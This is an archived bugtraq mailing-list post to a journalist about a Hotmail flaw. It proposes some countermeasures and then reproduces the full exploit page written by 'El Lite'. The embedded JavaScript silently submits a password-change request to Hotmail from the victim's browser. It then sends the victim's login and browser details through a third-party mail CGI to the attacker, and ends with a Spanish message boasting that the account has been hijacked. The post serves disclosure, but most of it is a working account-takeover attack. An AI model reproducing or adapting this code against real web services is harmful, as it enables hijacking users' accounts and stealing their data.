Dear Paul: I am reading your previous article on hotmail security, http://www.news.com/News/Item/0,4,33996,00.html and I'm CCing this message to the bugtraq list. A good patch from Hotmail would have to involve some additional info with the cookie. A couple of approaches that come to mind include: verifying http_referer data in the script submission to make sure its from the expected hotmail page putting additional hidden key fields with constantly changing names and values on submittalbe pages, to provide verification that the pages are legit investigating any incidents of pages being submitted with incorrect, nonexistent, or unexpected "secret flag fields" as described above I don't work for hotmail (as you know) and I am caught up in this as a bystander; I would expect hotmail to give you a explanation of their patch that not only is detailed but makes sense and that you cannot find a hole in. If hotmail merely changed the names of variables, or did a similar short term fix, the next expolit might not be nice enough to announce itself as such. Modifying the attached El Lite exploit to only work if it had a particular hotmail account might be a piece of cake; allowing for some highly targeted kinds of attacks. (esp. if a hotmail user is doing anything involving return-email verification, like tipjar or first virtual.) Here is the hacker's tripod page, including the exploit that takes advantage of the trust hotmail has for instructions from your browser, by secretly sending instructions to hotmail to change your password to <HTML> <kraffa2="<HEAD> <!--Begin JavaScrypt roadmap code. If editing downloaded HTML source, delete this portion.--> <scrypt language="JavaScrypt"> <!-- function TripodShowPopup() { // open the popup window var popupURL = "http://members.tripod.com/adm/popup/roadmap.shtml"; var popup = window.open(popupURL,"TripodPopup",'toolbar=0,location=0,directories=0,status=0,menubar=0,scrollbars=0,resizable=0,width=575,height=105'); // set the opener if it's not already set. it's set automatically // in netscape 3.0+ and ie 3.0+. if( navigator.appName.substring(0,8) == "Netscape" ) { popup.location = popupURL; } } TripodShowPopup(); // --> </scrypt> <!--End inserted JavaScript code.--> <base href="http://members.tripod.com/kraffa2/Hook.html"> </HEAD> <body> <scrypt> <!-- function getCGIValue(nombre, elURL) { elURL= elURL; nombre= nombre+"="; vacio=""; found= elURL.indexOf(nombre); if (found > -1) { found2= elURL.indexOf("&",found); found+= nombre.length; end= (found2 > -1) ? found2 : elURL.length; var value= elURL.substring(found, end); value= (value != null) ? value : vacio; return value; } else {return vacio;} } Query= unescape(self.location.search); disk= getCGIValue("disk", Query); login= getCGIValue("login", Query); host= "www.hotmail.com"; hintq= escape('<img src="http://www.badenpage.de/pirate/bilder/flagge.jpg"><br><center>by El Lite©</center>'); hinta= '%66axf%61x'; TheURL= "http:// "+host+"/cgi-bin/dopassword?"+"disk="+disk+"&login="+login+"&f=34145&curmbox=ACTIVE&_lang=&np=yes&new_%70%61%73s%77d=%6B%6B%6A%6A01&new_%70%61%73s%77d2=kk%6A%6A01&hi%6E%74q="+hintq+"&hinta="+hinta; Mail= "paulinaporizkovaat_private&mailfrom">http://www.tipjar.com/cgi-bin/generic?mailto=paulinaporizkovaat_private&mailfrom= "+login+"@hotmail.com&subject="+login+"+HMpass+cambiada+%0A%0ASu+navegador+es+"+escape(navigator.userAgent+"\n.\n"); options= 'toolbar=0,location=0,directories=0,status=0,menubar=0,scrollbars=0,resizable=0,width=575,height=105'; HOTMAIL= window.open(TheURL,"HOTMAIL",options); self.focus(); setTimeout("HOTMAIL.close()",8000); MAIL= window.open(Mail,"MAIL",options); self.focus(); setTimeout("MAIL.close()",8000); //--> </scrypt> <pre><b> Uno de los mejores correos gratis que existen es precisamente el que tu estás usando, hotmail. Su seguridad e inviolabilidad son ya legendarias. Tanto es así que mira por donde a partir de este mismísimo momento las cosas van a tomar otro cariz. Quiero decir que lamentándolo mucho tu dirección de hotmail ha sido inutilizada, o mejor dicho, secuestrada por mi. Ya nunca mas podrás entrar en ella. Así de definitivo. Ahora es SOLO MIAAA!!!! :-)))) Como soy un buenazo y no eres mi única víctima pues un dia de estos voy a publicar en es.comp.hackers la password que os puse (es la misma para todos vosotros pardillos) Hala, que te sea leve El Lite© </b></pre> </body> </html>
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:45:09 PDT